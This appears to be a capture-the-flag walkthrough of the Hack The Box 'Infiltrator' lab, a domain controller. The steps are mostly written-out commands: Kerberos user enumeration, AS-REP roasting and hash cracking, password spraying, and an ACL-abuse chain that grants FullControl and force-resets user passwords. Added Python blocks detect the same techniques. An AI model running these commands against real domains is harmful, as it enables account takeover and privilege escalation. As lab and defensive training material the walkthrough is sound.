This post is a walkthrough of Hack The Box - Infiltrator (work in progress).
Information gathering & port exploitation
nmap -sSVC infiltrator.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-02 09:17 CST
Nmap scan report for infiltrator.htb
Host is up (0.61s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Infiltrator.htb
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-02 01:19:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after: 2099-07-17T18:48:15
|_ssl-date: 2024-09-02T01:20:40+00:00; -3s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after: 2099-07-17T18:48:15
|_ssl-date: 2024-09-02T01:20:38+00:00; -2s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-02T01:20:40+00:00; -3s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after: 2099-07-17T18:48:15
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-02T01:20:38+00:00; -2s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after: 2099-07-17T18:48:15
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-02T01:20:39+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=dc01.infiltrator.htb
| Not valid before: 2024-07-30T13:20:17
|_Not valid after: 2025-01-29T13:20:17
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-09-02T01:20:07
|_ start_date: N/A
|_clock-skew: mean: -2s, deviation: 0s, median: -3s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Quite a few ports are open, and the host is a domain controller for the domain infiltrator.htb (dc01.infiltrator.htb). Start with port 80.
After looking around for a while, nothing particularly interesting turns up.
There is a contact/e-mail form, but as on earlier machines it is probably just decoration and cannot be used for anything.
Back to the port list: the target also has 139 and 445 open, so SMB may be worth checking. See the following link for details:
https://book.hacktricks.xyz/v/cn/network-services-pentesting/pentesting-smb
First use enum4linux to check for anonymous information disclosure:
enum4linux -a infiltrator.htb
Every query is denied; there is no anonymous access.
Back on the website, some user names appear on the pages. Can they be used to brute-force accounts?
The page source contains 7 user names in total.
Extract all of them.
Use these user names to brute-force valid accounts (here with kerbrute, which checks them against Kerberos):
./kerbrute userenum -d "infiltrator.htb" username.txt --dc "dc01.infiltrator.htb"
None of them are valid.
Back on the website, the information shown here suggests that the user name format is wrong.
Based on the usual Western name-abbreviation conventions and the e-mail address format on the site, generate a new wordlist.
Try the enumeration again.
This time valid user names are found. Next, use GetNPUsers to filter out all users that do not require Kerberos pre-authentication:
impacket-GetNPUsers infiltrator.htb/ -usersfile newname.txt -outputfile outputusers.txt -dc-ip dc01.infiltrator.htb -no-pass
This yields the AS-REP hash of the user l.clark. The hash corresponds to hashcat mode 18200; crack it with hashcat.
Run enum4linux again with the recovered credentials, and do a password spray at the same time.
Still nothing useful from enum4linux.
Password spraying:
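From the defender's side, the AS-REP roasting step above leaves two clear signals: accounts with the DONT_REQ_PREAUTH bit set in userAccountControl, and event 4768 TGT requests with pre-authentication type 0. The following Python is an added example, not part of this writeup; its user records and 4768 lines are constructed sample data with flattened field names, and the 192.0.2.x addresses are placeholders.

```python
"""Defender-side checks for the AS-REP roasting step above (added example).
User records and 4768 lines are constructed sample data with flattened fields."""
import re

DONT_REQ_PREAUTH = 0x400000   # userAccountControl bit: Kerberos pre-auth not required
NORMAL_ACCOUNT = 0x10200      # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD, a typical baseline

# Constructed sample of an LDAP query result; l.clark mirrors the finding above.
SAMPLE_USERS = [
    {"sAMAccountName": "l.clark", "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH},
    {"sAMAccountName": "d.anderson", "userAccountControl": NORMAL_ACCOUNT},
    {"sAMAccountName": "m.harris", "userAccountControl": NORMAL_ACCOUNT},
]

def roastable_accounts(users):
    """Audit: accounts whose userAccountControl has DONT_REQ_PREAUTH set."""
    return sorted(u["sAMAccountName"] for u in users
                  if u["userAccountControl"] & DONT_REQ_PREAUTH)

# Constructed, simplified Security log 4768 records (one per line, key=value).
# PreAuthType 0 means the TGT was issued without pre-authentication;
# TicketEncryptionType 0x17 is RC4, the etype that hashcat mode 18200 cracks.
SAMPLE_4768 = """\
EventID=4768 TargetUserName=l.clark PreAuthType=0 TicketEncryptionType=0x17 IpAddress=192.0.2.50
EventID=4768 TargetUserName=d.anderson PreAuthType=2 TicketEncryptionType=0x12 IpAddress=192.0.2.10
EventID=4768 TargetUserName=m.harris PreAuthType=2 TicketEncryptionType=0x12 IpAddress=192.0.2.11
EventID=4768 TargetUserName=svc_backup PreAuthType=0 TicketEncryptionType=0x12 IpAddress=192.0.2.50
"""

LINE_RE = re.compile(r"EventID=(\d+) TargetUserName=(\S+) PreAuthType=(\d+) "
                     r"TicketEncryptionType=(0x[0-9a-fA-F]+) IpAddress=(\S+)")

def asrep_roast_alerts(log_text):
    """Detection: 4768 events with PreAuthType 0. RC4 (0x17) without pre-auth
    is rated high (directly crackable offline); AES without pre-auth is medium."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(1) != "4768" or m.group(3) != "0":
            continue
        user, etype, src = m.group(2), int(m.group(4), 16), m.group(5)
        alerts.append((user, src, "high" if etype == 0x17 else "medium"))
    return alerts

if __name__ == "__main__":
    print("pre-auth disabled:", roastable_accounts(SAMPLE_USERS))
    for alert in asrep_roast_alerts(SAMPLE_4768):
        print("AS-REP roast candidate:", alert)
```

The audit side is the fix (clear the flag unless an application genuinely needs it); the 4768 side catches the request itself, which is how the GetNPUsers run above would appear on the DC.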
crackmapexec smb [ip] -u tname.txt -p [passwd]
The user d.anderson turns out to have the same password.
Collect domain information with BloodHound:
bloodhound-python -c ALL -u l.clark -p '[password]' -d dc01.infiltrator.htb -ns [ip]
bloodhound-python -c ALL -u d.anderson -p '[password]' -d dc01.infiltrator.htb -ns [ip]
Analyse the data in BloodHound.
From the graph, one attack path is: D.ANDERSON -> MARKETING DIGITAL -> E.RODRIGUEZ -> CHIEFS MARKETING -> M.HARRIS -> DC01
Now work through it step by step.
D.ANDERSON -> MARKETING DIGITAL
In this path, D.ANDERSON has GenericAll over the MARKETING DIGITAL OU. We already know that this user cannot log in directly and that the account's rights are restricted, so this step is about elevating what d.anderson can do. First obtain a TGT for the user, then use that TGT together with the GenericAll right to grant d.anderson full control over the marketing digital OU.
# obtain a TGT for d.anderson
impacket-getTGT infiltrator.htb/d.anderson:'[password]' -dc-ip dc01.infiltrator.htb
# use dacledit to modify the ACL so that d.anderson has full control
export KRB5CCNAME=d.anderson.ccache
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip [ip]
# if dacledit is not available, clone and set up https://github.com/ThePorgs/impacket.git
MARKETING DIGITAL -> E.RODRIGUEZ
Because e.rodriguez is contained in the marketing digital OU and d.anderson now has full control over it, the user's password can be changed directly.
Note: because of the password policy, this must be run quickly after the previous step, otherwise it errors.
# change e.rodriguez's password with d.anderson's rights and bloodyAD
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip [ip] -u "d.anderson" -p "[password]" set password "e.rodriguez" "[newpass]"
E.RODRIGUEZ -> CHIEFS MARKETING
In the previous step we changed e.rodriguez's password; the graph shows that the next step is to add this user to the chiefs marketing group.
# obtain a TGT for e.rodriguez
impacket-getTGT infiltrator.htb/"e.rodriguez":"[newpass]" -dc-ip dc01.infiltrator.htb
# add the user with the AddSelf right (export so the ticket is visible to bloodyAD)
export KRB5CCNAME=e.rodriguez.ccache
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --dc-ip [ip] -u e.rodriguez -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez
CHIEFS MARKETING -> M.HARRIS
After adding e.rodriguez to chiefs marketing, the graph shows that the chiefs marketing group can force-change m.harris's password, which means m.harris's password can also be force-changed as e.rodriguez.
# as e.rodriguez, now a member of chiefs marketing, change m.harris's password
export KRB5CCNAME=e.rodriguez.ccache
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.129.204.10 -u "e.rodriguez" -p "B3rry11\!" set password "m.harris" "B3rry22"
At this point Kerberos authentication started failing, most likely because the ticket had expired, so the whole sequence has to be rerun quickly. The consolidated sequence is:
# obtain a TGT for d.anderson
impacket-getTGT infiltrator.htb/d.anderson:'[password]' -dc-ip dc01.infiltrator.htb
# use dacledit to modify the ACL so that d.anderson has full control
export KRB5CCNAME=d.anderson.ccache
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip [ip]
# change e.rodriguez's password with d.anderson's rights and bloodyAD
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip [ip] -u "d.anderson" -p "[password]" set password "e.rodriguez" "[newpass]"
# obtain a TGT for e.rodriguez
impacket-getTGT infiltrator.htb/"e.rodriguez":"[newpass]" -dc-ip dc01.infiltrator.htb
# add the user with the AddSelf right
export KRB5CCNAME=e.rodriguez.ccache
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --dc-ip [ip] -u e.rodriguez -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez
# as e.rodriguez, now a member of chiefs marketing, change m.harris's password
python3 /root/Desktop/Tools/bloodyAD-main/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip [ip] -u "e.rodriguez" -p "B3rry11\!" set password "m.harris" "B3rry22"
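The chain above (DACL rewrite on the OU, password reset, self-add to a group, another password reset) shows up in the DC's Security log as events 5136, 4724 and 4728, where each later action is taken by an account that was itself reset a minute earlier. The following Python correlator is an added example, not from the writeup; the events are constructed samples with flattened fields, and the one-hour window is an assumed tuning value.

```python
"""Correlating the ACL-abuse chain above in DC Security events (added example).
Events are constructed samples: (timestamp, event id, subject, target, detail)."""
from datetime import datetime, timedelta

# 5136 = directory service object modified (detail = attribute changed)
# 4724 = password reset attempted by another account (subject resets target)
# 4728 = member added to a security-enabled global group (detail = member)
SAMPLE_EVENTS = [
    ("2024-09-02T02:00:05", 5136, "d.anderson",
     "OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB", "nTSecurityDescriptor"),
    ("2024-09-02T02:00:40", 4724, "d.anderson", "e.rodriguez", ""),
    ("2024-09-02T02:01:30", 4728, "e.rodriguez", "CHIEFS MARKETING", "e.rodriguez"),
    ("2024-09-02T02:02:10", 4724, "e.rodriguez", "m.harris", ""),
    ("2024-09-02T09:15:00", 4724, "helpdesk.admin", "j.doe", ""),  # routine reset
]

def takeover_chains(events, window=timedelta(hours=1)):
    """Attribute actions taken by a freshly reset account to whoever reset it,
    so the whole path is reported under the root actor. Assumed window: 1 hour."""
    owner = {}    # account -> (root actor that reset it, time of the reset)
    chains = {}   # root actor -> ordered list of objects that actor reached
    for ts, eid, subject, target, detail in sorted(events):
        t = datetime.fromisoformat(ts)
        root = subject
        if subject in owner and t - owner[subject][1] <= window:
            root = owner[subject][0]        # subject is acting on a reset password
        steps = chains.setdefault(root, [root])
        if eid == 5136 and detail == "nTSecurityDescriptor":
            steps.append("acl:" + target)   # DACL rewrite, e.g. a FullControl grant
        elif eid == 4724:
            owner[target] = (root, t)
            steps.append(target)
        elif eid == 4728 and root != subject:
            steps.append("group:" + target) # reset account adding itself to a group
    # a lone password reset is routine; an ACL write plus a reset, or a reset
    # followed by activity from the reset account, is worth a ticket
    return {r: c for r, c in chains.items() if len(c) > 2}

if __name__ == "__main__":
    for root, path in takeover_chains(SAMPLE_EVENTS).items():
        print(root, "->", " -> ".join(path[1:]))
```

Auditing 5136 requires an object-level SACL on the OU for "Write permissions"; without it the dacledit step leaves no 5136 record and only the 4724/4728 pair remains to correlate.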
After the run, the tool reports that the password was changed successfully. Next, try requesting a ticket and logging in with evil-winrm.
It reports that it cannot locate the KDC for INFILTRATOR.HTB; the local /etc/krb5.conf needs to be edited:
[libdefaults]
    default_realm = INFILTRATOR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false
    forwardable = true

[realms]
    INFILTRATOR.HTB = {
        kdc = dc01.infiltrator.htb
        admin_server = dc01.infiltrator.htb
    }

[domain_realm]
    .infiltrator.htb = INFILTRATOR.HTB
    infiltrator.htb = INFILTRATOR.HTB